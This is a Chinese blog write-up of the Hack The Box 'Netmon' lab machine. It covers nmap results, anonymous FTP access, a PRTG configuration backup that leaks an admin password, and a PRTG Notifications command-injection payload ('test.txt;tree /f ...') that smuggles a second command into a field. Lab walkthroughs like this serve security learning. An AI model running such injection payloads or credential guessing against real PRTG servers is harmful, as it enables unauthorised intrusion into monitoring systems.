HTB 靶机 Netmon-Windows WP


Netmon-Windows

https://www.hackthebox.eu/home/machines/profile/177
IP: 10.10.10.152

nmap 扫描

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-10 19:45 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating NSE at 19:45
Completed NSE at 19:45, 0.00s elapsed
Initiating Ping Scan at 19:45
Scanning 10.10.10.152 [4 ports]
Completed Ping Scan at 19:45, 0.32s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:45
Completed Parallel DNS resolution of 1 host. at 19:45, 0.03s elapsed
Initiating SYN Stealth Scan at 19:45
Scanning 10.10.10.152 [1000 ports]
Discovered open port 135/tcp on 10.10.10.152
Discovered open port 139/tcp on 10.10.10.152
Discovered open port 445/tcp on 10.10.10.152
Discovered open port 80/tcp on 10.10.10.152
Discovered open port 21/tcp on 10.10.10.152
Increasing send delay for 10.10.10.152 from 0 to 5 due to 23 out of 56 dropped probes since last increase.
Completed SYN Stealth Scan at 19:46, 51.60s elapsed (1000 total ports)
Initiating Service scan at 19:46
Scanning 5 services on 10.10.10.152
Completed Service scan at 19:46, 11.53s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.152
Retrying OS detection (try #2) against 10.10.10.152
Retrying OS detection (try #3) against 10.10.10.152
Retrying OS detection (try #4) against 10.10.10.152
Retrying OS detection (try #5) against 10.10.10.152
Initiating Traceroute at 19:46
Completed Traceroute at 19:46, 0.36s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:46
Completed Parallel DNS resolution of 2 hosts. at 19:46, 0.04s elapsed
NSE: Script scanning 10.10.10.152.
Initiating NSE at 19:46
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 19:46, 11.52s elapsed
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Nmap scan report for 10.10.10.152
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 15s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-06-10 19:47:00
|_  start_date: 2019-06-10 18:23:19

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   341.39 ms 10.10.14.1
2   341.99 ms 10.10.10.152

NSE: Script Post-scanning.
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Initiating NSE at 19:46
Completed NSE at 19:46, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.12 seconds
           Raw packets sent: 1275 (60.374KB) | Rcvd: 1540 (139.830KB)

!

FTP匿名登录

发现ftp可以匿名访问:

在/Users/Public/user.txt

80端口运行PRTG Network Monitor服务
在c:\Windows\下发现配置文件restart.bat

net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService

在C:\ProgramData\Paessler\PRTG Network Monitor目录中发现备份文件PRTG Configuration.old.bak。

查找到明文用户名:prtgadmin。密码PrTg@dmin2018,尝试登陆后失败,PrTg@dmin2019登陆成功。

登录成功

已知漏洞搜索

Google 搜索 PRTG 漏洞,发现PRTG < 18.2.39 Command Injection Vulnerability

得到:在Devices菜单下的Notifications下存在命令执行漏洞。
在Execute Program 下 设置参数为下图所示,并保存设置。

test.txt;tree /f c:\Users\Administrator > c:\output.txt

进入Devices界面,发现一个DNS服务器处于宕机状态

在此处添加通知,如下图所示:

add triggers

Object Triggers

在ftp中发现返回结果output.txt

尝试导出Desktop下的root.txt,更改Devices菜单下的Notifications的Execute Program参数为:

在ftp中查看返回的结果:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Windows认证 Windows认证
Windows 认证Windows 本地认证本地认证基础在本地登录Windows的情况下,操作系统会使用用户输入的密码作为凭证去与系统中的密码进行验证,但是操作系统中的密码存储在哪里呢?路径:%SystemRoot%\system32\co
2019-07-07
下一篇 
fastjson 反序列化导致任意命令执行漏洞 fastjson 反序列化导致任意命令执行漏洞
fastjson 反序列化导致任意命令执行漏洞漏洞原理 http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%8
2019-06-09 Geekby
  目录